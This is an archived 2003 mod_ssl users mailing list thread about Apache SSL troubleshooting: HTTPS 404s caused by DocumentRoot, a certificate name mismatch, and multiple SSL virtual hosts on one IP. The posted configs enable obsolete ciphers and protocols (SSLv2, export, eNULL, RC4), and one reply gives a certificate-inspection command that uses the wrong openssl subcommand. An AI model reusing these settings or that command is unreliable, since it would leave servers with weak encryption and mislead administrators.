> [15/Mar/2003 14:30:20 11314] [info]  Init: Initializing (virtual) servers
> for
> SSL
> [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring server
> matrix.pelathe.org:443 for SSL protocol
> [15/Mar/2003 14:30:20 11314] [info]  Init: (matrix.pelathe.org:443) RSA
> server
> certificate enables Server Gated Cryptography (SGC)
> [15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA
> server
> certificate CommonName (CN) `www.pelathe.org' does NOT match se
> rver name!?
> [15/Mar/2003 14:34:52 11671] [info]  Connection to child 2 established
> (server
> matrix.pelathe.org:443, client 24.124.34.100)
> [15/Mar/2003 14:34:52 11671] [info]  Seeding PRNG with 1160 bytes of
> entropy [15/Mar/2003 14:37:04 11671] [info]  Connection: Client IP:
> 24.124.34.100, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
> [15/Mar/2003 14:37:04 11671] [info]  Initial (No.1) HTTPS request received
> for
> child 2 (server matrix.pelathe.org:443)
> [15/Mar/2003 14:37:16 11671] [info]  Subsequent (No.2) HTTPS request
> received
> for child 2 (server matrix.pelathe.org:443)
> [15/Mar/2003 14:37:33 11671] [info]  Connection to child 2 closed with
> standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
> [15/Mar/2003 14:52:36 11499] [info]  Connection to child 1 established
> (server
> matrix.pelathe.org:443, client 24.124.34.100)
> [15/Mar/2003 14:52:36 11499] [info]  Seeding PRNG with 1160 bytes of
> entropy [15/Mar/2003 14:52:36 11499] [info]  Connection: Client IP:
> 24.124.34.100, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
> [15/Mar/2003 14:52:36 11499] [info]  Initial (No.1) HTTPS request received
> for
> child 1 (server matrix.pelathe.org:443)
> [15/Mar/2003 14:52:52 11499] [info]  Connection to child 1 closed with
> standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
> ssl_engine_log lines 394-440/440 (END)
>
> I'll go ahead and post the mod_ssl section of my httpd.conf as well, sans
> the
> descriptive text:
>
> 
>
> SSLPassPhraseDialog  builtin
>
> #SSLSessionCache        none
> #SSLSessionCache        shmht:/var/run/ssl_scache(512000)
> #SSLSessionCache        shmcb:/var/run/ssl_scache(512000)
> SSLSessionCache         dbm:/var/run/ssl_scache
> SSLSessionCacheTimeout  300
>
> SSLMutex  file:/var/run/ssl_mutex
>
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> #SSLRandomSeed startup file:/dev/random  512
> #SSLRandomSeed startup file:/dev/urandom 512
> #SSLRandomSeed connect file:/dev/random  512
> #SSLRandomSeed connect file:/dev/urandom 512
>
> SSLLog      /var/log/httpd/ssl_engine_log
> SSLLogLevel trace
>
> 
>
> 
>
> ##
> ## SSL Virtual Host Context
> ##
>
> 
>
> DocumentRoot "/srv/www/htdocs"
> ServerName matrix.pelathe.org
> ServerAdmin tkitchen@pelathe.org
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /etc/httpd/ssl.crt/www.pelathe.org.crt
>
> SSLCertificateKeyFile /etc/httpd/ssl.key/www.pelathe.org.key
>
> SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
>
> SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
>
> SSLCARevocationPath /etc/httpd/ssl.crl
>
> SSLVerifyClient none
> SSLVerifyDepth  10
>
> #
> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> #
>
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog /var/log/httpd/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> I hope this helps. I'm really becoming baffled by this.
>
> On Thursday 13 March 2003 13:36, you wrote:
> > A. Putnam said:
> > > Right then. I moved my certificates into their respective directories
> > > and  re-reeditted my httpd.conf file to reflect those changes and set
> > > the  SSLVerifyClient to 'none'. I was not sure where to go to change
> > > the logging  to 'trace' though. But, I can get into the secure server
> > > now so it  technically works. (thank you again Camun, and DuFresne and
> > > Stromas too)
> >
> > SSLLogLevel trace
> >
> > > However, I am finding that all of the pages I've visited while in
https
> > > are  pulling up 404 errors. The same pages pull up fine in http. Do I
> > > need to have  a mirrored web directory just for https to get the files
> > > to show up or  something? This is the only real conclusion I can think
> > > of.
> >
> > What does the access log say?
> >
> > If you still can't figure it out looking at logs you should post your
> > httpd.conf>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 21:14:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C32962AA02A; Fri, 14 Mar 2003 21:14:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id DEDAC2AA015
	for ; Fri, 14 Mar 2003 21:14:35 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 3A82F80E1D
	for ; Sat, 15 Mar 2003 16:39:33 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Sat, 15 Mar 2003 16:39:32 -0600
User-Agent: KMail/1.4.3
References: <200303141525.14074.aputnam@pelathe.org> <200303151602.34721.aputnam@pelathe.org> <039101c2ea62$336e33b0$9f05a8c0@rgedyew2k>
In-Reply-To: <039101c2ea62$336e33b0$9f05a8c0@rgedyew2k>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303151639.32797.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ohhhh...okay. I see it now. One of those 'duh, it's right in front of me'=
=20
things.=20

Ok, so now I've changed the DocumentRoot, but the only  li=
ne I=20
could find already had the correct path in it. There was one other=20
 type line:


    SSLOptions +StdEnvVars


But it didn't have any effect when I changed it so I changed it back.=20

On Friday 14 March 2003 13:45, Ron Gedye wrote:
> 
>
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
>
> Is DocumentRoot above the actual content of your site? (betting not)  M=
aybe
> compare this setting to what is set for port 80 (http)
> Other than that I had no problems with getting to your site via https.
>
> #
> # DocumentRoot: The directory out of which you will serve your
> # documents. By default, all requests are taken from this directory, bu=
t
> # symbolic links and aliases may be used to point to other locations.
> #
> DocumentRoot "/home/httpd/html"
>
> There is usually a related setting (maybe not in virtual hosts, little
> rusty - brainfog)
> #
> # This should be changed to whatever you set DocumentRoot to.
> #
> 
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Saturday, March 15, 2003 4:02 PM
> Subject: Re: private key not found
>
>
> Changed the SeverName - thanks, I was wondering about that.
>
> How do I check my Docroot? "& add  ?" What does that mea=
n?
>
> On Friday 14 March 2003 12:53, Ron Gedye wrote:
> > Quick check...
> > Check your Docroot (& add  ?).  Just looked at your si=
te &
>
> I
>
> > get http fine (with content) but https shows SuSE test page.
> >
> > FYI - to remove this error:
> > [15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) R=
SA
> > server
> > certificate CommonName (CN) `www.pelathe.org' does NOT match se
> > rver name!?
> >
> > change this line...
> > ServerName matrix.pelathe.org
> >  (no big deal...)
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Saturday, March 15, 2003 3:07 PM
> > Subject: Re: private key not found
> >
> >
> > I found the SSLLogLevel, thanks. Here is the engine log from today. I=
'm
>
> not
>
> > really sure what to make of it...
> >
> > [15/Mar/2003 14:30:18 11313] [info]  Server: Apache/1.3.26, Interface=
:
> > mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
> > [15/Mar/2003 14:30:18 11313] [info]  Init: 1st startup round (still n=
ot
> > detached)
> > [15/Mar/2003 14:30:18 11313] [info]  Init: Initializing OpenSSL libra=
ry
> > [15/Mar/2003 14:30:18 11313] [info]  Init: Loading certificate & priv=
ate
> > key of SSL-aware server matrix.pelathe.org:443
> > [15/Mar/2003 14:30:18 11313] [info]  Init: Seeding PRNG with 136 byte=
s of
> > entropy
> > [15/Mar/2003 14:30:18 11313] [info]  Init: Generating temporary RSA
>
> private
>
> > keys (512/1024 bits)
> > [15/Mar/2003 14:30:18 11313] [info]  Init: Configuring temporary DH
> > parameters
> > (512/1024 bits)
> > [15/Mar/2003 14:30:20 11314] [info]  Init: 2nd startup round (already
> > detached)
> > [15/Mar/2003 14:30:20 11314] [info]  Init: Reinitializing OpenSSL lib=
rary
> > [15/Mar/2003 14:30:20 11314] [info]  Init: Seeding PRNG with 136 byte=
s of
> > entropy
> > [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary RSA
> > private keys (512/1024 bits)
> > [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary DH
> > parameters
> > (512/1024 bits)
> > [15/Mar/2003 14:30:20 11314] [info]  Init: Initializing (virtual) ser=
vers
> > for
> > SSL
> > [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring server
> > matrix.pelathe.org:443 for SSL protocol
> > [15/Mar/2003 14:30:20 11314] [info]  Init: (matrix.pelathe.org:443) R=
SA
> > server
> > certificate enables Server Gated Cryptography (SGC)
> > [15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) R=
SA
> > server
> > certificate CommonName (CN) `www.pelathe.org' does NOT match se
> > rver name!?
> > [15/Mar/2003 14:34:52 11671] [info]  Connection to child 2 establishe=
d
> > (server
> > matrix.pelathe.org:443, client 24.124.34.100)
> > [15/Mar/2003 14:34:52 11671] [info]  Seeding PRNG with 1160 bytes of
> > entropy [15/Mar/2003 14:37:04 11671] [info]  Connection: Client IP:
> > 24.124.34.100, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
> > [15/Mar/2003 14:37:04 11671] [info]  Initial (No.1) HTTPS request
> > received for
> > child 2 (server matrix.pelathe.org:443)
> > [15/Mar/2003 14:37:16 11671] [info]  Subsequent (No.2) HTTPS request
> > received
> > for child 2 (server matrix.pelathe.org:443)
> > [15/Mar/2003 14:37:33 11671] [info]  Connection to child 2 closed wit=
h
> > standard shutdown (server matrix.pelathe.org:443, client 24.124.34.10=
0)
> > [15/Mar/2003 14:52:36 11499] [info]  Connection to child 1 establishe=
d
> > (server
> > matrix.pelathe.org:443, client 24.124.34.100)
> > [15/Mar/2003 14:52:36 11499] [info]  Seeding PRNG with 1160 bytes of
> > entropy [15/Mar/2003 14:52:36 11499] [info]  Connection: Client IP:
> > 24.124.34.100, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
> > [15/Mar/2003 14:52:36 11499] [info]  Initial (No.1) HTTPS request
> > received for
> > child 1 (server matrix.pelathe.org:443)
> > [15/Mar/2003 14:52:52 11499] [info]  Connection to child 1 closed wit=
h
> > standard shutdown (server matrix.pelathe.org:443, client 24.124.34.10=
0)
> > ssl_engine_log lines 394-440/440 (END)
> >
> > I'll go ahead and post the mod_ssl section of my httpd.conf as well, =
sans
> > the
> > descriptive text:
> >
> > 
> >
> > SSLPassPhraseDialog  builtin
> >
> > #SSLSessionCache        none
> > #SSLSessionCache        shmht:/var/run/ssl_scache(512000)
> > #SSLSessionCache        shmcb:/var/run/ssl_scache(512000)
> > SSLSessionCache         dbm:/var/run/ssl_scache
> > SSLSessionCacheTimeout  300
> >
> > SSLMutex  file:/var/run/ssl_mutex
> >
> > SSLRandomSeed startup builtin
> > SSLRandomSeed connect builtin
> > #SSLRandomSeed startup file:/dev/random  512
> > #SSLRandomSeed startup file:/dev/urandom 512
> > #SSLRandomSeed connect file:/dev/random  512
> > #SSLRandomSeed connect file:/dev/urandom 512
> >
> > SSLLog      /var/log/httpd/ssl_engine_log
> > SSLLogLevel trace
> >
> > 
> >
> > 
> >
> > ##
> > ## SSL Virtual Host Context
> > ##
> >
> > 
> >
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
> >
> > SSLEngine on
> >
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > SSLCertificateFile /etc/httpd/ssl.crt/www.pelathe.org.crt
> >
> > SSLCertificateKeyFile /etc/httpd/ssl.key/www.pelathe.org.key
> >
> > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> >
> > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> >
> > SSLCARevocationPath /etc/httpd/ssl.crl
> >
> > SSLVerifyClient none
> > SSLVerifyDepth  10
> >
> > #
> > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> > #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       )=
 \
> > #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> > #
> >
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> >
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> >
> > CustomLog /var/log/httpd/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> >
> > 
> >
> > I hope this helps. I'm really becoming baffled by this.
> >
> > On Thursday 13 March 2003 13:36, you wrote:
> > > A. Putnam said:
> > > > Right then. I moved my certificates into their respective directo=
ries
> > > > and  re-reeditted my httpd.conf file to reflect those changes and=
 set
> > > > the  SSLVerifyClient to 'none'. I was not sure where to go to cha=
nge
> > > > the logging  to 'trace' though. But, I can get into the secure se=
rver
> > > > now so it  technically works. (thank you again Camun, and DuFresn=
e
> > > > and Stromas too)
> > >
> > > SSLLogLevel trace
> > >
> > > > However, I am finding that all of the pages I've visited while in
>
> https
>
> > > > are  pulling up 404 errors. The same pages pull up fine in http. =
Do I
> > > > need to have  a mirrored web directory just for https to get the
> > > > files to show up or  something? This is the only real conclusion =
I
> > > > can think of.
> > >
> > > What does the access log say?
> > >
> > > If you still can't figure it out looking at logs you should post yo=
ur
> > > httpd.conf>
> >
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g
> >
> >
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 01:20:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 30CE62AA02A; Sat, 15 Mar 2003 01:20:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visualcontact.com (danmccomb.com [63.231.43.185])
	by master.modssl.org (Postfix) with SMTP id CAB9D2AA01F
	for ; Sat, 15 Mar 2003 01:20:30 +0100 (CET)
Received: from visualcontact.com ([63.231.43.187] ) by visualcontact.com (AppleMailServer 10.1.4.0) id 101338u via TCP with SMTP; Fri, 14 Mar 2003 16:20:27 -0800
Date: Fri, 14 Mar 2003 16:20:26 -0800
Mime-Version: 1.0 (Apple Message framework v551)
Content-Type: text/plain; delsp=yes; charset=US-ASCII; format=flowed
Subject: problem installing cert on virtual host
From: Dan McComb 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: 
X-Mailer: Apple Mail (2.551)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan McComb 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've successfully installed one virtual host on my server to listen on  
port 443, and it's been running great. But when I added another virtual  
host directive to listen on same port further down in the file, I find  
that the first listener is the one that "picks up" the request. This  
results in an error in IE: "the identity certificate name is not  
correct." If I comment out the first virtual host, the problem  
disappears and the second one works fine. I need them to work  
together...

Anyone know how can I configure my virtual hosts/httpd.conf to avoid  
this problem?

/dan mccomb

------------------------------------------------------------------------ 
------------

Visual Contact
311 First Ave. S, Suite 200
Seattle, WA 98104

206.223.0417 Office
206.718.5361 Cell

dan@visualcontact.com
http://www.visualcontact.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 01:58:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9F2C02AA02A; Sat, 15 Mar 2003 01:58:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id 5E0E12AA01F
	for ; Sat, 15 Mar 2003 01:58:45 +0100 (CET)
Received: from rocky (207.175.219.206:3486)
	by beaucox.com with [XMail 1.14 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Fri, 14 Mar 2003 14:58:38 -1000
From: beau@beaucox.com
To: modssl-users@modssl.org
Date: Fri, 14 Mar 2003 14:58:38 -1000
MIME-Version: 1.0
Subject: Re: problem installing cert on virtual host
Message-ID: <3E71EE1E.22772.80B9F98@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: beau@beaucox.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 14 Mar 2003 at 16:20, Dan McComb wrote:

> I've successfully installed one virtual host on my server to listen on  
> port 443, and it's been running great. But when I added another virtual  
> host directive to listen on same port further down in the file, I find  
> that the first listener is the one that "picks up" the request. This  
> results in an error in IE: "the identity certificate name is not  
> correct." If I comment out the first virtual host, the problem  
> disappears and the second one works fine. I need them to work  
> together...
> 
> Anyone know how can I configure my virtual hosts/httpd.conf to avoid  
> this problem?
> 
> /dan mccomb
> 
> ------------------------------------------------------------------------ 
> ------------
> 

Hi - I'm new to mod_ssl, but have just successfully
done what you are describing. Can you post
the pertianant part of you httpd.conf?

Also - do you point to each servers' certificate
and private key within each vhost with the
SSLCertuficateFile and
CCLCertificateKeyFile directives?

Aloha => Beau;

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 02:14:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 306BE2AA02A; Sat, 15 Mar 2003 02:14:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visualcontact.com (danmccomb.com [63.231.43.185])
	by master.modssl.org (Postfix) with SMTP id 9F44E2AA01F
	for ; Sat, 15 Mar 2003 02:14:05 +0100 (CET)
Received: from visualcontact.com ([63.231.43.187] ) by visualcontact.com (AppleMailServer 10.1.4.0) id 101543u via TCP with SMTP; Fri, 14 Mar 2003 17:14:02 -0800
Date: Fri, 14 Mar 2003 17:14:01 -0800
Subject: Re: problem installing cert on virtual host
Content-Type: text/plain; delsp=yes; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v551)
From: Dan McComb 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <3E71EE1E.22772.80B9F98@localhost>
Message-Id: <67FD8694-5683-11D7-B1E3-0030656DB292@visualcontact.com>
X-Mailer: Apple Mail (2.551)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan McComb 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks Beau,

Here's the pertinent bits (this file may look a bit strange -- it's a  
Mac OS X Server conf file, but functions in almost every way like  
traditional http.conf file):

#
NameVirtualHost 63.231.43.185:443
Listen 63.231.43.185:443

ServerName ncascades.org
#WebPerfCacheEnable Off
#SiteAutomaticallyDisabled Off
ServerAdmin dan@visualcontact.com
DocumentRoot "/Volumes/Bigone/Accounts/nci/Sites"
DirectoryIndex index.html index.ldmx
CustomLog "/Volumes/Bigone/Accounts/nci/Logs/access_log" combined
ErrorLog "/Volumes/Bigone/Accounts/nci/Logs/error_log"

SSLEngine On
SSLLog "/private/var/log/httpd/ssl_engine_log"
#SSLCertificateChainFile "/private/etc/httpd/ssl.crt/ca.crt159"
SSLCertificateFile "/private/etc/httpd/ssl.crt/server.crt159"
SSLCertificateKeyFile "/private/etc/httpd/ssl.key/server.key159"
SSLCipherSuite "RSA:-HIGH:-MEDIUM:-LOW:+EXP"
#SSLPassPhrase ncascades.org:443 "blahblah"


DAVLockDB "/private/var/run/davlocks/.davlock159"
DAVMinTimeout 600


Options All +MultiViews +ExecCGI -Indexes
AllowOverride All

DAV Off


#

AuthName "ncascades.org"
AuthType Basic

Require no-user


#

#

#
#NameVirtualHost 63.231.43.185:443
#Listen 63.231.43.185:443

ServerName www.pacific-papers.com
#WebPerfCacheEnable Off
#SiteAutomaticallyDisabled Off
ServerAdmin dan@visualcontact.com
DocumentRoot "/Volumes/Bigone/Accounts/pacific_paper/Sites"
DirectoryIndex index.html index.ldmx
CustomLog "/Volumes/Bigone/Accounts/nci/Logs/access_log" combined
ErrorLog "/Volumes/Bigone/Accounts/nci/Logs/error_log"

SSLEngine On
SSLLog "/private/var/log/httpd/ssl_engine_log"
#SSLCertificateChainFile "/private/etc/httpd/ssl.crt/ca.crt160"
SSLCertificateFile "/private/etc/httpd/ssl.crt/server.crt160"
SSLCertificateKeyFile "/private/etc/httpd/ssl.key/server.key160"
SSLCipherSuite "RSA:-HIGH:-MEDIUM:-LOW:+EXP"
#SSLPassPhrase www.pacific-papers.com:443 "blahblah"


DAVLockDB "/private/var/run/davlocks/.davlock160"
DAVMinTimeout 600


Options All +MultiViews +ExecCGI -Indexes
AllowOverride All

DAV Off


#

AuthName "www.pacific-papers.com"
AuthType Basic

Require no-user


#

#


On Friday, March 14, 2003, at 04:58  PM, beau@beaucox.com wrote:

> On 14 Mar 2003 at 16:20, Dan McComb wrote:
>
>> I've successfully installed one virtual host on my server to listen on
>> port 443, and it's been running great. But when I added another  
>> virtual
>> host directive to listen on same port further down in the file, I find
>> that the first listener is the one that "picks up" the request. This
>> results in an error in IE: "the identity certificate name is not
>> correct." If I comment out the first virtual host, the problem
>> disappears and the second one works fine. I need them to work
>> together...
>>
>> Anyone know how can I configure my virtual hosts/httpd.conf to avoid
>> this problem?
>>
>> /dan mccomb
>>
>> ---------------------------------------------------------------------- 
>> --
>> ------------
>>
>
> Hi - I'm new to mod_ssl, but have just successfully
> done what you are describing. Can you post
> the pertianant part of you httpd.conf?
>
> Also - do you point to each servers' certificate
> and private key within each vhost with the
> SSLCertuficateFile and
> CCLCertificateKeyFile directives?
>
> Aloha => Beau;
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

------------------------------------------------------------------------ 
------------

Visual Contact
311 First Ave. S, Suite 200
Seattle, WA 98104

206.223.0417 Office
206.718.5361 Cell

dan@visualcontact.com
http://www.visualcontact.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 07:47:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8D9072AA02A; Sat, 15 Mar 2003 07:47:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id B762A2AA01F
	for ; Sat, 15 Mar 2003 07:47:46 +0100 (CET)
Received: from rocky (207.175.219.206:3497)
	by beaucox.com with [XMail 1.14 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Fri, 14 Mar 2003 20:47:41 -1000
From: beau@beaucox.com
To: modssl-users@modssl.org
Date: Fri, 14 Mar 2003 20:47:41 -1000
MIME-Version: 1.0
Subject: Re: problem installing cert on virtual host
Message-ID: <3E723FED.11334.94B3504@localhost>
References: <3E71EE1E.22772.80B9F98@localhost>
In-reply-to: <67FD8694-5683-11D7-B1E3-0030656DB292@visualcontact.com>
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: beau@beaucox.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 14 Mar 2003 at 17:14, Dan McComb wrote:

> Thanks Beau,
> 
> Here's the pertinent bits (this file may look a bit strange -- it's a  
> Mac OS X Server conf file, but functions in almost every way like  
> traditional http.conf file):
> [...]
> 
> On Friday, March 14, 2003, at 04:58  PM, beau@beaucox.com wrote:
> 
> > On 14 Mar 2003 at 16:20, Dan McComb wrote:
> >
> >> I've successfully installed one virtual host on my server to listen on
> >> port 443, and it's been running great. But when I added another  
> >> virtual
> >> host directive to listen on same port further down in the file, I find
> >> that the first listener is the one that "picks up" the request. This
> >> results in an error in IE: "the identity certificate name is not
> >> correct." If I comment out the first virtual host, the problem
> >> disappears and the second one works fine. I need them to work
> >> together...
> >>
> >> Anyone know how can I configure my virtual hosts/httpd.conf to avoid
> >> this problem?
> >>
> >> /dan mccomb
> >>
> >> ---------------------------------------------------------------------- 
> >> --
> >> ------------
> >>
> > [...]

Hi -

I see nothing wrong with your conf file. I have some
suggestions:

* since your SSL servers work one at a time, perhaps
this is not an SSL problem. Remember, the first
vhost is the 'default': any request that does
not match a name (within that ip:port group)
is sent to that first server. Why don't you comment
out the SSL directives, change the ports to 80,
and see if you can browse to each vhost?

* in the same vein, is you bind (dns) server setup
OK?

* you may want to look at each server cert:

openssl rsa -noout -text -in .crt

the subject CN should match the server name.

* if you certs are self-signed, your browser
will give you an error - that the CA is not
recognized as trusted - but everything else
should be OK if your CN matches the server
name.

Let me know how it goes...

Aloha => Beau;

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 15 08:13:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
